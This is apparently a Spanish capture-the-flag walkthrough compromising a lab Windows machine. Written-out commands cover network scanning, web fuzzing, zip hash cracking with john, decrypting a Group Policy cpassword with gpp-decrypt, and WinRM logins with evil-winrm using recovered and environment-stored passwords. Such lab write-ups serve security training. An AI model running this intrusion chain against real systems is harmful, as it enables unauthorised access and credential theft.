Comenzamos con averiguar la dirección IP de la Máquina Victima, para ello primeramente utilizaremos la herramienta netdiscover, para ello ejecutamos el siguiente comando:
$ netdiscover -i eth1 -r 10.0.2.0/24
- Kali (Máquina Atacante): 10.0.2.4
- Máquina Victima: 10.0.2.71
Comprobamos si tenemos conexión con la Máquina Victima, para ello ejecutamos el siguiente comando:
$ ping -c 1 10.0.2.71
Como se puede comprobar por el TTL nos enfrentamos a una Máquina Windows.
A continuación, realizamos con la herramienta nmap un reconocimiento de los servicios, para ello ejecutamos el siguiente comando:
$ nmap -Pn -p- 10.0.2.71 -sVC
Como podemos comprobar la Máquina Victima tiene abiertos los puertos 80, 135, 139, 445, 5985, 47001, 49664, 49665, 49666, 49667, 49668, 49669 y 49670.
Comprobamos que es lo que corre por el puerto 80.
A continuación, realizamos con la herramienta gobuster un fuzzing web, para ello ejecutamos el siguiente comando:
$ gobuster dir -u http://10.0.2.71 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
Encontramos el directorio backup.
Accedemos a el.
Volvemos a realizar con la herramienta gobuster un fuzzing web por extensiones, para ello ejecutamos el siguiente comando:
$ gobuster dir -u http://10.0.2.71/backup -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x bak,zip,rar
Encontramos el fichero groups.zip.
Accedemos a el para descargarlo.
Al intentar descomprimirlo nos pide contraseña, extraemos el hash del fichero .zip con la herramienta zip2john, para ello ejecutamos el siguiente comando:
$ zip2john groups.zip > groupshash
A continuación, intentamos crackearlo, para ello utilizamos la herramienta john indicando el diccionario rockyou, para ello ejecutamos el siguiente comando:
$ john groupshash --wordlist=rockyou.txt
Obtenemos la contraseña Zipper.
Descomprimimos el fichero .zip, para ello ejecutamos el siguiente comando:
$ unzip groups.zip
Obtenemos el fichero Groups.xml.
Lo visualizamos, para ello ejecutamos el siguiente comando:
$ cat Groups.xml
Obtenemos el password del usuario xerosec encriptada en AES256 en la variable cpassword.
A continuación, con la herramienta gpp-decrypt desciframos la contraseña, para ello ejecutamos el siguiente comando:
$ gpp-decrypt IwLNLy0Ck5xIlXEsPMTbOF1f/NnliQFKeGv139eUEgE
Obtenemos la contraseña GPP2k26blahblah.
Nos conectamos a la maquina victima a traves de
WinRM (
5985) con la ayuda de la herramienta
evil-winrm, para ello ejecutamos el siguiente comando:
$ evil-winrm -i 10.0.2.71 -u 'xerosec' -p 'GPP2k26blahblah'
Revisamos las variables de entorno, para ello ejecutamos el siguiente comnando:
PS> dir env:
Encontramos la variable PASSWORD que almacena la contraseña GigaAdmin123! que es probable que sea del usuario administrator ya que es el unico usuario que hay a parte del usuario actual Xerosec.
Nos volvemos a conectar a la maquina victima a traves de
WinRM (
5985) con la ayuda de la herramienta
evil-winrm, para ello ejecutamos el siguiente comando:
$ evil-winrm -i 10.0.2.71 -u 'administrator' -p 'GigaAdmin123!'
¡¡¡Ya somos administrator!!!.